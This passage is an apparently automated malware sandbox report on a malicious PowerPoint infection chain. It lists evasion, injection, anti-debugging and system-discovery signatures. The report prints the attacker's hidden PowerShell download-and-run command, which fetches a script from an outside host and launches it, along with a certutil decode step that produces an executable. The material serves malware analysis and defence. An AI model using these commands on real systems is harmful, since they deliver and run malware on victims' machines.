Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: api-ms-win-appmodel-runtime-l1-1-0.dll

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to add an ACL to a security descriptor
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_0040D8BA AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityW,FreeSid,LocalFree,LocalFree,LocalFree,10_2_0040D8BA
Contains functionality to create a new security descriptor
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_004064D2 OpenProcess,ProcessIdToSessionId,CloseHandle,OpenProcessToken,DuplicateTokenEx,SetTokenInformation,SetTokenInformation,AllocateAndInitializeSid,GetLengthSid,SetTokenInformation,FreeSid,SetTokenInformation,CreateEnvironmentBlock,GetProcessHeap,HeapAlloc,GetCaretBlinkTime,GetProcessHeap,HeapAlloc,CreatePopupMenu,CreateProcessAsUserW,CloseHandle,OpenProcessToken,CloseHandle,CloseHandle,DestroyEnvironmentBlock,CloseHandle,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,10_2_004064D2
May try to detect the Windows Explorer process (often used for injection)
Source: wscript.exe, mstsc.exeBinary or memory string: Progman
Source: wscript.exe, mstsc.exeBinary or memory string: Program Manager
Source: wscript.exe, mstsc.exeBinary or memory string: Shell_TrayWnd
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden -Exec Bypass 'IEX (New-Object System.Net.WebClient).DownloadFile('http:'+[char] 0x2F+[char] 0x2F+'cccn.nl'+[char] 0x2F+'c.php',\'$env:temp\ii.jse\'); Invoke-Item \'$env:temp\ii.jse\''
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden -Exec Bypass 'IEX (New-Object System.Net.WebClient).DownloadFile('http:'+[char] 0x2F+[char] 0x2F+'cccn.nl'+[char] 0x2F+'c.php',\'$env:temp\ii.jse\'); Invoke-Item \'$env:temp\ii.jse\''
Maps a DLL or memory area into another process
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeSection loaded: unknown target pid: 3140 protection: execute and read and write
Writes to foreign memory regions
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeMemory written: C:\Windows\System32\mstsc.exe base: E384EC
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeMemory written: C:\Windows\System32\mstsc.exe base: E384ED
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeMemory written: C:\Windows\System32\mstsc.exe base: E384EE
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeMemory written: C:\Windows\System32\mstsc.exe base: E384EF
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeMemory written: C:\Windows\System32\mstsc.exe base: E384F0
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exeNetwork Connect: 185.159.82.38 200
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 46.21.169.110 80

Anti Debugging:

Contains functionality to register its own exception handler
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_0041FFF1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_0041FFF1
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_00420488 SetUnhandledExceptionFilter,10_2_00420488
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_004224C7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_004224C7
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_1_0041FFF1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_1_0041FFF1
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_1_004224C7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_1_004224C7
Creates guard pages, often used to prevent reverse engineering and debugging
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory allocated: page read and write and page guard
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSystem information queried: KernelDebuggerInformation
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_0041FFF1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_0041FFF1
Contains functionality to dynamically determine API calls
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_0040EFB9 EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCapture,GetProcessHeap,GetProcessHeap,HeapAlloc,GetFocus,LoadLibraryA,GetProcAddress,GetCommandLineW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetModuleFileNameW,GetProcessHeap,RtlAllocateHeap,IsSystemResumeAutomatic,GetProcessHeap,GetModuleHandleW,ExitProcess,GetCurrentProcess,GetVersion,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetActiveWindow,GetProcessHeap,GetProcessHeap,HeapAlloc,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,StrStrIW,StrStrIW,StrStrIW,CreateThread,CloseHandle,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,Sleep,10_2_0040EFB9
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_0040F995 GetProcessHeap,CreateProcessW,GetProcessHeap,HeapAlloc,GetShellWindow,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCapture,GetModuleHandleA,GetProcAddress,NtCreateSection,CloseHandle,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,10_2_0040F995
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

Malware Analysis System Evasion:

Contains functionality to enumerate / list files inside a directory
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_004022E6 GetProfilesDirectoryW,GetProfilesDirectoryW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProfilesDirectoryW,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,GetProcessHeap,FindFirstFileW,GetProcessHeap,HeapAlloc,GetCommandLineA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetForegroundWindow,lstrcmpW,GetProcessHeap,lstrcmpW,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetMenuCheckMarkDimensions,wsprintfW,GetFileAttributesW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FindNextFileW,FindClose,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,10_2_004022E6
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_0040DDBF lstrlenW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapFree,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,lstrcpyW,GetProcessHeap,HeapAlloc,GetProcessWindowStation,lstrcatW,lstrcpyW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,lstrcatW,FindFirstFileW,GetProcessHeap,lstrlenW,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,lstrcpyW,lstrcatW,lstrcatW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,10_2_0040DDBF
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_00401E16 GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProfilesDirectoryW,GetProcessHeap,wsprintfW,FindFirstFileW,StrCmpW,StrCmpW,StrCpyW,GetProcessHeap,HeapAlloc,GetProcessWindowStation,StrCatW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetDoubleClickTime,wsprintfW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,FindNextFileW,FindClose,GetProcessHeap,HeapAlloc,GetDialogBaseUnits,ExpandEnvironmentStringsW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,10_2_00401E16
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_0040BB40 GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,ReleaseCapture,GetProcessHeap,GetSystemDirectoryW,lstrcatW,FindFirstFileW,StrRChrW,FindNextFileW,FindFirstFileW,FindClose,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,10_2_0040BB40
Source: C:\Windows\System32\mstsc.exeCode function: 13_2_00061E16 GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProfilesDirectoryW,GetProcessHeap,wsprintfW,FindFirstFileW,StrCmpW,StrCmpW,StrCpyW,GetProcessHeap,HeapAlloc,GetProcessWindowStation,StrCatW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetDoubleClickTime,wsprintfW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,FindNextFileW,FindClose,GetProcessHeap,HeapAlloc,GetDialogBaseUnits,ExpandEnvironmentStringsW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,13_2_00061E16
Source: C:\Windows\System32\mstsc.exeCode function: 13_2_000622E6 GetProfilesDirectoryW,GetProfilesDirectoryW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProfilesDirectoryW,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,GetProcessHeap,FindFirstFileW,GetProcessHeap,HeapAlloc,GetCommandLineA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetForegroundWindow,lstrcmpW,GetProcessHeap,lstrcmpW,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetMenuCheckMarkDimensions,wsprintfW,GetFileAttributesW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FindNextFileW,FindClose,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,13_2_000622E6
Source: C:\Windows\System32\mstsc.exeCode function: 13_2_0006BB40 GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,ReleaseCapture,GetProcessHeap,GetSystemDirectoryW,lstrcatW,FindFirstFileW,StrRChrW,FindNextFileW,FindFirstFileW,FindClose,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,13_2_0006BB40
Source: C:\Windows\System32\mstsc.exeCode function: 13_2_0006DDBF lstrlenW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapFree,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,lstrcpyW,GetProcessHeap,HeapAlloc,GetProcessWindowStation,lstrcatW,lstrcpyW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,lstrcatW,FindFirstFileW,GetProcessHeap,lstrlenW,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,lstrcpyW,lstrcatW,lstrcatW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,13_2_0006DDBF
Contains functionality to query system information
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_0040C055 GetProcessHeap,GetProcessHeap,HeapAlloc,IsSystemResumeAutomatic,GetProcessHeap,HeapAlloc,GetClipboardSequenceNumber,GetModuleHandleA,GetProcAddress,GlobalMemoryStatusEx,GetSystemInfo,GetProcessHeap,HeapAlloc,GetDesktopWindow,RegOpenKeyW,HeapFree,GetProcessHeap,HeapAlloc,GetClipboardViewer,RegQueryValueExW,HeapFree,GetProcessHeap,HeapAlloc,CountClipboardFormats,StrStrIW,StrStrIW,Sleep,StrStrIW,GetProcessHeap,HeapFree,HeapFree,RegCloseKey,GetProcessHeap,HeapFree,Sleep,HeapFree,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,10_2_0040C055
Queries a list of all running processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Checks the free space of harddrives
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEFile Volume queried: C:\Windows\System32 FullSizeInformation
Contains capabilities to detect virtual machines
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Contains functionality to detect sandboxes (foreground window change detection)
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: GetProcessHeap,GetProcessHeap,GetProcessHeap,HeapAlloc,ReleaseCapture,ExpandEnvironmentStringsW,GetShortPathNameW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetForegroundWindow,wsprintfW,GetProcessHeap,GetProcessHeap,HeapAlloc,RevertToSelf,CoInitializeEx,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCapture,GetProcessHeap,GetProcessHeap,HeapAlloc,GetDoubleClickTime,LoadLibraryA,GetProcAddress,GetLastError,Sleep,GetForegroundWindow,CoUninitialize,CloseHandle,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,10_2_0040A0EE
Source: C:\Windows\System32\mstsc.exeCode function: GetProcessHeap,GetProcessHeap,GetProcessHeap,HeapAlloc,ReleaseCapture,ExpandEnvironmentStringsW,GetShortPathNameW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetForegroundWindow,wsprintfW,GetProcessHeap,GetProcessHeap,HeapAlloc,RevertToSelf,CoInitializeEx,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCapture,GetProcessHeap,GetProcessHeap,HeapAlloc,GetDoubleClickTime,LoadLibraryA,GetProcAddress,GetLastError,Sleep,GetForegroundWindow,CoUninitialize,CloseHandle,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,13_2_0006A0EE
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: -922337203685477
Enumerates the file system
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Found evasive API chain (may stop execution after accessing registry keys)
Source: C:\Windows\System32\mstsc.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep (graph_13-3213)
Found large amount of non-executed APIs
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeAPI coverage: 5.3 %
Source: C:\Windows\System32\mstsc.exeAPI coverage: 4.7 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2448Thread sleep time: -922337203685477s >= -60s
Source: C:\Windows\System32\wscript.exe TID: 2536Thread sleep time: -120000s >= -60s
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe TID: 3080Thread sleep time: -31000s >= -60s
Source: C:\Windows\System32\mstsc.exe TID: 3144Thread sleep time: -10000s >= -60s
Source: C:\Windows\System32\mstsc.exe TID: 3144Thread sleep time: -10000s >= -60s
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Windows\System32\mstsc.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep (graph_13-3133)
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep (graph_10-12082)
Found stalling execution ending in API Sleep call
Source: C:\Windows\System32\mstsc.exeStalling execution: Execution stalls by calling Sleep (graph_13-3220)
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\mstsc.exeLast function: Thread delayed

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeProcess information set: FAILCRITICALERRORS and NOGPFAULTERRORBOX
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mstsc.exeProcess information set: FAILCRITICALERRORS and NOGPFAULTERRORBOX
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_001702B2 RtlExitUserThread,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,10_2_001702B2
Uses certutil -decode
Source: unknownProcess created: C:\Windows\System32\certutil.exe 'C:\Windows\System32\certutil.exe' -decode C:\Users\LUKETA~1\AppData\Local\Temp\168.gop C:\Users\LUKETA~1\AppData\Local\Temp\484.exe
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\certutil.exe 'C:\Windows\System32\certutil.exe' -decode C:\Users\LUKETA~1\AppData\Local\Temp\168.gop C:\Users\LUKETA~1\AppData\Local\Temp\484.exe

Language, Device and Operating System Detection:

Contains functionality to query local / system time
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_0040DAD5 GetSystemTime,SystemTimeToFileTime,SystemTimeToFileTime,SystemTimeToFileTime,SystemTimeToFileTime,GetProcessHeap,HeapAlloc,ReleaseCapture,CreateFileW,GetFileTime,SystemTimeToFileTime,SystemTimeToFileTime,SystemTimeToFileTime,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,10_2_0040DAD5
Contains functionality to query the account / user name
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_0040A98B GetProcessHeap,GetProcessHeap,HeapAlloc,GetCapture,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,GetModuleHandleA,GetProcessHeap,GetUserNameA,GetProcessHeap,HeapAlloc,GetClipboardViewer,lstrcmpA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetFocus,lstrcmpA,GetProcessHeap,GetComputerNameA,GetProcessHeap,HeapAlloc,GetCursor,lstrcmpA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetMenuCheckMarkDimensions,lstrcmpA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetMessageExtraInfo,GetProcessHeap,GetProcessHeap,HeapAlloc,GetClipboardOwner,GetProcessHeap,GetProcessHeap,HeapAlloc,GetLastError,GetProcessHeap,GetProcessHeap,HeapAlloc,CountClipboardFormats,GetProcessHeap,GetProcessHeap,HeapAlloc,GetFocus,GetProcessHeap,GetProcessHeap,HeapAlloc,GetMessageExtraInfo,GetProcessHeap,GetProcessHeap,HeapAlloc,GetForegroundWindow,GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessWindowStation,GetProcessHeap,GetProcessHeap,HeapAlloc,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCaptur10_2_0040A98B
Contains functionality to query windows version
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_0040EFB9 EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCapture,GetProcessHeap,GetProcessHeap,HeapAlloc,GetFocus,LoadLibraryA,GetProcAddress,GetCommandLineW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetModuleFileNameW,GetProcessHeap,RtlAllocateHeap,IsSystemResumeAutomatic,GetProcessHeap,GetModuleHandleW,ExitProcess,GetCurrentProcess,GetVersion,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetActiveWindow,GetProcessHeap,GetProcessHeap,HeapAlloc,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,StrStrIW,StrStrIW,StrStrIW,CreateThread,CloseHandle,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,Sleep,10_2_0040EFB9
Queries the cryptographic machine GUID
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Contains functionality to query locale information (e.g. system language)
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,10_2_0042C882
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,___crtGetLocaleInfoA,GetLocaleInfoW,10_2_004244D8
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,10_2_0042C8E9
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,10_2_0042C796
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: __getptd,_TranslateName,_TranslateName,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,__itow_s,10_2_0042C925
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,10_2_0042C56A
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,10_2_0042C4C3
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: _strlen,EnumSystemLocalesA,10_2_0042C859
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,10_2_0042C3CE
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,10_1_0042C882
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,__freea,10_1_0042B9C8
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,___crtGetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,10_1_004244D8
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,10_1_0042C8E9
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,10_1_0042C5C5
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,10_1_0042C796
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: __getptd,_TranslateName,_TranslateName,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,__itow_s,10_1_0042C925
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,10_1_0042C56A
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,10_1_0042C4C3
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: GetLocaleInfoA,___ascii_strnicmp,10_1_0042FC9F
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,10_1_0042C3CE
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Windows\System32\mstsc.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Queries the installation date of Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
